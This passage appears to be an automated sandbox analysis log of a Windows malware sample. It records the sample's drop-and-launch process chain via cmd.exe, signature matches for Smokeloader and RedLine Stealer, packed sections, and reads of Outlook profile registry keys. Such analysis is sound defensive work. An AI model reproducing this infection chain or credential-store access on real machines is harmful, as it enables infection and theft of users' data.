                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_001278BB12_2_001278BB
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_00122D1012_2_00122D10
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_001231A812_2_001231A8
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_000E4DE012_2_000E4DE0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_00117F3612_2_00117F36
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_000E4B3012_2_000E4B30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 12_2_0012779B12_2_0012779B
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0041094014_2_00410940
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0041A34614_2_0041A346
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0040EBC714_2_0040EBC7
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00403D4014_2_00403D40
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00415E5914_2_00415E59
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0040B6D014_2_0040B6D0
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00402EE014_2_00402EE0
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00404F7014_2_00404F70
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0040EF0914_2_0040EF09
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0041572E14_2_0041572E
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0047380014_2_00473800
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0055B80014_2_0055B800
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_004A40C414_2_004A40C4
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005B0CC714_2_005B0CC7
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005DB14F14_2_005DB14F
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0055294614_2_00552946
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005E6D3114_2_005E6D31
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005DE9F814_2_005DE9F8
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0047358414_2_00473584
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005D11B614_2_005D11B6
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005E01AE14_2_005E01AE
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005D961A14_2_005D961A
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005E522414_2_005E5224
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0053EEE814_2_0053EEE8
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005D468614_2_005D4686
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00490AB614_2_00490AB6
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005E374F14_2_005E374F
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00594B7214_2_00594B72
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00538B7F14_2_00538B7F
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0057F32A14_2_0057F32A
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0050DFC514_2_0050DFC5
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005E87C614_2_005E87C6
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_005D2BFD14_2_005D2BFD
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00705DFD14_2_00705DFD
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00705E0C14_2_00705E0C
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_049551D714_2_049551D7
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0495EE2E14_2_0495EE2E
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_04953FA714_2_04953FA7
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0496599514_2_04965995
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_049551D714_2_049551D7
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0495B93714_2_0495B937
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0495F17014_2_0495F170
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_04960BA714_2_04960BA7
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: String function: 0495AA07 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: String function: 0040A7A0 appears 35 times
                      Source: random[1].exe.1.drStatic PE information: Resource name: RT_CURSOR type: DOS executable (COM, 0x8C-variant)
                      Source: 607f096cd3.exe.12.drStatic PE information: Resource name: RT_CURSOR type: DOS executable (COM, 0x8C-variant)
                      Source: file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                      Source: file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000E.00000002.2675534930.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: file.exeStatic PE information: Section: gxrwbqyp ZLIB complexity 0.9947213156504678
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: Section: ZLIB complexity 0.9977648160762943
                      Source: DocumentsIIEBGIDAAF.exe.1.drStatic PE information: Section: cldzocnb ZLIB complexity 0.9948737077067669
                      Source: random[1].exe.1.drStatic PE information: Section: ZLIB complexity 0.9935186106687898
                      Source: random[1].exe.1.drStatic PE information: Section: dfoyrrjq ZLIB complexity 0.9925540305862671
                      Source: skotes.exe.8.drStatic PE information: Section: ZLIB complexity 0.9977648160762943
                      Source: skotes.exe.8.drStatic PE information: Section: cldzocnb ZLIB complexity 0.9948737077067669
                      Source: 607f096cd3.exe.12.drStatic PE information: Section: ZLIB complexity 0.9935186106687898
                      Source: 607f096cd3.exe.12.drStatic PE information: Section: dfoyrrjq ZLIB complexity 0.9925540305862671
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/5@0/5
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,14_2_00402A50
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_047A8464 CreateToolhelp32Snapshot,Module32First,14_2_047A8464
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,14_2_00401970
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\4SEEXYXR.htmJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCommand line argument: nosub14_2_004087E0
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCommand line argument: mixtwo14_2_004087E0
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: file.exe, 00000001.00000002.1982668661.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: file.exe, 00000001.00000002.1982668661.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: file.exe, 00000001.00000002.1982668661.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: file.exe, 00000001.00000002.1982668661.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: file.exe, 00000001.00000002.1982668661.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: file.exe, 00000001.00000002.1982668661.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: file.exe, 00000001.00000002.1982668661.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: file.exe, 00000001.00000002.1982668661.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: file.exe, 00000001.00000002.1982668661.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1976492237.000000001D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: file.exeReversingLabs: Detection: 47%
                      Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: DocumentsIIEBGIDAAF.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: 607f096cd3.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsIIEBGIDAAF.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsIIEBGIDAAF.exe "C:\Users\user\DocumentsIIEBGIDAAF.exe"
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe "C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsIIEBGIDAAF.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsIIEBGIDAAF.exe "C:\Users\user\DocumentsIIEBGIDAAF.exe" Jump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe "C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: chartv.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: atlthunk.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: file.exeStatic file information: File size 1802240 > 1048576
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: file.exeStatic PE information: Raw size of gxrwbqyp is bigger than: 0x100000 < 0x19e200

                      Data Obfuscation

                      barindex
